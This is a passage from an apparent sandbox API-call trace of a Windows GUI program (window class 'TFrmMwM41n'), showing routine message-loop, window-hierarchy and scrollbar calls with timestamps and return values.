(param_1=0x10166, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0040.034] FlatSB_SetScrollInfo (param_1=0x10166, code=1, psi=0x68ff0d8, fRedraw=1) returned 0 [0040.035] FlatSB_GetScrollPos (param_1=0x10166, code=1) returned 0 [0040.035] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.035] IsIconic (hWnd=0x10166) returned 0 [0040.036] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff09c | out: lpRect=0x68ff09c) returned 1 [0040.036] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.036] IsIconic (hWnd=0x10166) returned 0 [0040.036] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff09c | out: lpRect=0x68ff09c) returned 1 [0040.036] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.036] IsIconic (hWnd=0x10166) returned 0 [0040.036] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff09c | out: lpRect=0x68ff09c) returned 1 [0040.036] FlatSB_SetScrollProp (param_1=0x10166, index=0x200, newValue=0x0, param_4=0) returned 0 [0040.036] GetSysColor (nIndex=20) returned 0xffffff [0040.036] FlatSB_SetScrollProp (param_1=0x10166, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0040.036] FlatSB_SetScrollInfo (param_1=0x10166, code=0, psi=0x68ff0d8, fRedraw=1) returned 0 [0040.036] FlatSB_GetScrollPos (param_1=0x10166, code=0) returned 0 [0040.036] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.037] IsIconic (hWnd=0x10166) returned 0 [0040.037] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff09c | out: lpRect=0x68ff09c) returned 1 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x3, wParam=0x0, lParam=0xfe5afe44) returned 0x0 [0040.037] IsIconic (hWnd=0x10166) returned 0 [0040.037] GetWindowRect (in: hWnd=0x10166, lpRect=0x68ff0dc | out: lpRect=0x68ff0dc) returned 1 [0040.037] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 382664704 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] GetCurrentThreadId () returned 0xc04 [0040.037] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff878, fWinIni=0x0 | out: pvParam=0x68ff878) returned 1 [0040.037] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0040.037] IsWindowUnicode (hWnd=0x70144) returned 1 [0040.037] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0040.037] GetCapture () returned 0x0 [0040.037] GetWindowThreadProcessId (in: hWnd=0x70144, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.037] GetCurrentProcessId () returned 0x4f0 [0040.037] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.037] GetPropW (hWnd=0x70144, lpString=0xc031) returned 0x0 [0040.038] GetParent (hWnd=0x70144) returned 0x0 [0040.038] TranslateMessage (lpMsg=0x68ff884) returned 0 [0040.038] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0040.038] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.038] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.038] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.038] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.038] GetCurrentProcessId () returned 0x4f0 [0040.038] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.038] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.038] GetParent (hWnd=0x10070) returned 0x1006e [0040.038] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.038] GetCurrentProcessId () returned 0x4f0 [0040.038] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.038] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.038] GetParent (hWnd=0x1006e) returned 0x10068 [0040.038] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.038] GetCurrentProcessId () returned 0x4f0 [0040.038] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.038] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.038] GetParent (hWnd=0x10068) returned 0x10038 [0040.038] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.038] GetCurrentProcessId () returned 0x4f0 [0040.039] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.039] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.039] GetParent (hWnd=0x10038) returned 0x0 [0040.039] IsWindowVisible (hWnd=0x10166) returned 1 [0040.039] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.039] GetCurrentThreadId () returned 0xc04 [0040.039] ResetEvent (hEvent=0xb2c) returned 1 [0040.039] GetCurrentThreadId () returned 0xc04 [0040.039] GetCurrentThreadId () returned 0xc04 [0040.039] GetCurrentThreadId () returned 0xc04 [0040.039] WaitMessage () returned 1 [0040.070] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.070] DefWindowProcW (hWnd=0x70144, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x10027 [0040.070] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.070] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.070] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.070] GetCurrentProcessId () returned 0x4f0 [0040.070] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.070] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.070] GetParent (hWnd=0x10070) returned 0x1006e [0040.070] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.070] GetCurrentProcessId () returned 0x4f0 [0040.070] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.070] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.070] GetParent (hWnd=0x1006e) returned 0x10068 [0040.070] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.070] GetCurrentProcessId () returned 0x4f0 [0040.070] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.070] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.070] GetParent (hWnd=0x10068) returned 0x10038 [0040.070] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.071] GetCurrentProcessId () returned 0x4f0 [0040.071] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.071] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.071] GetParent (hWnd=0x10038) returned 0x0 [0040.071] IsWindowVisible (hWnd=0x10166) returned 1 [0040.071] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.071] GetCurrentThreadId () returned 0xc04 [0040.071] ResetEvent (hEvent=0xb2c) returned 1 [0040.071] GetCurrentThreadId () returned 0xc04 [0040.071] GetCurrentThreadId () returned 0xc04 [0040.071] GetCurrentThreadId () returned 0xc04 [0040.071] WaitMessage () returned 1 [0040.071] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.071] DefWindowProcW (hWnd=0x70144, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x180117 [0040.071] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.071] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.071] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.071] GetCurrentProcessId () returned 0x4f0 [0040.071] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.072] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.072] GetParent (hWnd=0x10070) returned 0x1006e [0040.072] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.072] GetCurrentProcessId () returned 0x4f0 [0040.072] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.072] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.072] GetParent (hWnd=0x1006e) returned 0x10068 [0040.072] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.072] GetCurrentProcessId () returned 0x4f0 [0040.072] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.072] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.072] GetParent (hWnd=0x10068) returned 0x10038 [0040.072] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.072] GetCurrentProcessId () returned 0x4f0 [0040.072] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.072] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.072] GetParent (hWnd=0x10038) returned 0x0 [0040.072] IsWindowVisible (hWnd=0x10166) returned 1 [0040.072] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.072] GetCurrentThreadId () returned 0xc04 [0040.072] ResetEvent (hEvent=0xb2c) returned 1 [0040.072] GetCurrentThreadId () returned 0xc04 [0040.072] GetCurrentThreadId () returned 0xc04 [0040.072] GetCurrentThreadId () returned 0xc04 [0040.072] WaitMessage () returned 1 [0040.073] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.073] DefWindowProcW (hWnd=0x70144, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0040.073] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.073] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.073] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.073] GetCurrentProcessId () returned 0x4f0 [0040.073] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.073] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.073] GetParent (hWnd=0x10070) returned 0x1006e [0040.073] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.073] GetCurrentProcessId () returned 0x4f0 [0040.073] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.073] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.073] GetParent (hWnd=0x1006e) returned 0x10068 [0040.073] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.073] GetCurrentProcessId () returned 0x4f0 [0040.073] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.073] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.073] GetParent (hWnd=0x10068) returned 0x10038 [0040.074] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.074] GetCurrentProcessId () returned 0x4f0 [0040.074] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.074] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.074] GetParent (hWnd=0x10038) returned 0x0 [0040.074] IsWindowVisible (hWnd=0x10166) returned 1 [0040.074] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.074] GetCurrentThreadId () returned 0xc04 [0040.074] ResetEvent (hEvent=0xb2c) returned 1 [0040.074] GetCurrentThreadId () returned 0xc04 [0040.074] GetCurrentThreadId () returned 0xc04 [0040.074] GetCurrentThreadId () returned 0xc04 [0040.074] WaitMessage () returned 1 [0040.075] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0040.075] IsWindowUnicode (hWnd=0x70144) returned 1 [0040.075] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0040.075] GetCapture () returned 0x0 [0040.075] GetWindowThreadProcessId (in: hWnd=0x70144, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.075] GetCurrentProcessId () returned 0x4f0 [0040.075] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.075] GetPropW (hWnd=0x70144, lpString=0xc031) returned 0x0 [0040.075] GetParent (hWnd=0x70144) returned 0x0 [0040.075] TranslateMessage (lpMsg=0x68ff884) returned 0 [0040.075] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0040.075] DefWindowProcW (hWnd=0x70144, Msg=0xc08d, wParam=0x0, lParam=0x0) returned 0x0 [0040.075] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.075] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.075] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.075] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.075] GetCurrentProcessId () returned 0x4f0 [0040.075] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.075] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.075] GetParent (hWnd=0x10070) returned 0x1006e [0040.075] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.076] GetCurrentProcessId () returned 0x4f0 [0040.076] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.076] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.076] GetParent (hWnd=0x1006e) returned 0x10068 [0040.076] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.076] GetCurrentProcessId () returned 0x4f0 [0040.076] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.076] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.076] GetParent (hWnd=0x10068) returned 0x10038 [0040.076] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.076] GetCurrentProcessId () returned 0x4f0 [0040.076] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.076] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.076] GetParent (hWnd=0x10038) returned 0x0 [0040.076] IsWindowVisible (hWnd=0x10166) returned 1 [0040.076] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.076] GetCurrentThreadId () returned 0xc04 [0040.076] ResetEvent (hEvent=0xb2c) returned 1 [0040.076] GetCurrentThreadId () returned 0xc04 [0040.076] GetCurrentThreadId () returned 0xc04 [0040.076] GetCurrentThreadId () returned 0xc04 [0040.076] WaitMessage () returned 1 [0040.339] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0040.339] IsWindowUnicode (hWnd=0x10168) returned 1 [0040.339] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0040.339] GetCapture () returned 0x0 [0040.339] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.339] GetCurrentProcessId () returned 0x4f0 [0040.339] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.339] GetPropW (hWnd=0x10168, lpString=0xc031) returned 0x0 [0040.339] GetParent (hWnd=0x10168) returned 0x40142 [0040.339] GetWindowThreadProcessId (in: hWnd=0x40142, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.339] GetCurrentProcessId () returned 0x4f0 [0040.339] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.339] GetPropW (hWnd=0x40142, lpString=0xc031) returned 0x0 [0040.339] GetParent (hWnd=0x40142) returned 0x10166 [0040.339] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.339] GetCurrentProcessId () returned 0x4f0 [0040.339] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.339] GetPropW (hWnd=0x10166, lpString=0xc031) returned 0x71713c0 [0040.339] TranslateMessage (lpMsg=0x68ff884) returned 0 [0040.339] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0040.339] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.339] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.339] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.339] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.339] GetCurrentProcessId () returned 0x4f0 [0040.339] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.340] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.340] GetParent (hWnd=0x10070) returned 0x1006e [0040.340] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.340] GetCurrentProcessId () returned 0x4f0 [0040.340] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.340] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.340] GetParent (hWnd=0x1006e) returned 0x10068 [0040.340] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.340] GetCurrentProcessId () returned 0x4f0 [0040.340] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.340] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.340] GetParent (hWnd=0x10068) returned 0x10038 [0040.340] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.340] GetCurrentProcessId () returned 0x4f0 [0040.340] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.340] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.340] GetParent (hWnd=0x10038) returned 0x0 [0040.340] IsWindowVisible (hWnd=0x10166) returned 1 [0040.340] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.340] GetCurrentThreadId () returned 0xc04 [0040.340] ResetEvent (hEvent=0xb2c) returned 1 [0040.340] GetCurrentThreadId () returned 0xc04 [0040.340] GetCurrentThreadId () returned 0xc04 [0040.340] GetCurrentThreadId () returned 0xc04 [0040.340] WaitMessage () returned 1 [0040.694] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0040.694] IsWindowUnicode (hWnd=0x30150) returned 1 [0040.694] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0040.694] GetCapture () returned 0x0 [0040.694] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.694] GetCurrentProcessId () returned 0x4f0 [0040.694] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.694] GetPropW (hWnd=0x30150, lpString=0xc031) returned 0x0 [0040.694] GetParent (hWnd=0x30150) returned 0x0 [0040.694] TranslateMessage (lpMsg=0x68ff884) returned 0 [0040.694] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0040.694] GetForegroundWindow () returned 0x10166 [0040.694] SendMessageW (hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0040.694] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0040.694] GetCurrentThreadId () returned 0xc04 [0040.694] GetCurrentThreadId () returned 0xc04 [0040.694] GetCurrentThreadId () returned 0xc04 [0040.694] GetCurrentThreadId () returned 0xc04 [0040.694] GetCurrentThreadId () returned 0xc04 [0040.695] GetCurrentThreadId () returned 0xc04 [0040.695] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0040.695] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.695] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.695] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.695] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.695] GetCurrentProcessId () returned 0x4f0 [0040.695] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.695] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.695] GetParent (hWnd=0x10070) returned 0x1006e [0040.695] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.695] GetCurrentProcessId () returned 0x4f0 [0040.695] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.695] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.695] GetParent (hWnd=0x1006e) returned 0x10068 [0040.695] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.695] GetCurrentProcessId () returned 0x4f0 [0040.695] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.695] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.695] GetParent (hWnd=0x10068) returned 0x10038 [0040.695] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.695] GetCurrentProcessId () returned 0x4f0 [0040.695] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.696] GetPropW (hWnd=0x10038, lpString=0xc031) returned 0x0 [0040.696] GetParent (hWnd=0x10038) returned 0x0 [0040.696] IsWindowVisible (hWnd=0x10166) returned 1 [0040.696] IsWindowEnabled (hWnd=0x10166) returned 1 [0040.696] GetCurrentThreadId () returned 0xc04 [0040.696] ResetEvent (hEvent=0xb2c) returned 1 [0040.696] GetCurrentThreadId () returned 0xc04 [0040.696] GetCurrentThreadId () returned 0xc04 [0040.696] GetCurrentThreadId () returned 0xc04 [0040.696] WaitMessage () returned 1 [0040.725] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0040.725] IsWindowUnicode (hWnd=0x10158) returned 1 [0040.725] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0040.725] GetCapture () returned 0x0 [0040.725] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0040.725] GetCurrentProcessId () returned 0x4f0 [0040.725] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.725] GetPropW (hWnd=0x10158, lpString=0xc031) returned 0x0 [0040.725] GetParent (hWnd=0x10158) returned 0x0 [0040.725] TranslateMessage (lpMsg=0x68ff884) returned 0 [0040.725] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0040.725] ShowWindow (hWnd=0x70144, nCmdShow=0) returned 1 [0040.725] DefWindowProcW (hWnd=0x70144, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0040.726] DefWindowProcW (hWnd=0x70144, Msg=0x46, wParam=0x0, lParam=0x68ff6d4) returned 0x0 [0040.726] DefWindowProcW (hWnd=0x70144, Msg=0x47, wParam=0x0, lParam=0x68ff6d4) returned 0x0 [0040.726] KillTimer (hWnd=0x10158, uIDEvent=0x1) returned 1 [0040.726] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 0 [0040.726] GetCursorPos (in: lpPoint=0x68ff844 | out: lpPoint=0x68ff844*(x=991, y=872)) returned 1 [0040.727] WindowFromPoint (Point=0x3df) returned 0x10070 [0040.727] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.727] GetCurrentProcessId () returned 0x4f0 [0040.727] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.727] GetPropW (hWnd=0x10070, lpString=0xc031) returned 0x0 [0040.727] GetParent (hWnd=0x10070) returned 0x1006e [0040.727] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.727] GetCurrentProcessId () returned 0x4f0 [0040.727] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.727] GetPropW (hWnd=0x1006e, lpString=0xc031) returned 0x0 [0040.727] GetParent (hWnd=0x1006e) returned 0x10068 [0040.727] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.727] GetCurrentProcessId () returned 0x4f0 [0040.727] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0040.727] GetPropW (hWnd=0x10068, lpString=0xc031) returned 0x0 [0040.727] GetParent (hWnd=0x10068) returned 0x10038 [0040.727] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x68ff80c | out: lpdwProcessId=0x68ff80c) returned 0x524 [0040.727] GetCurrentProcessId () returned 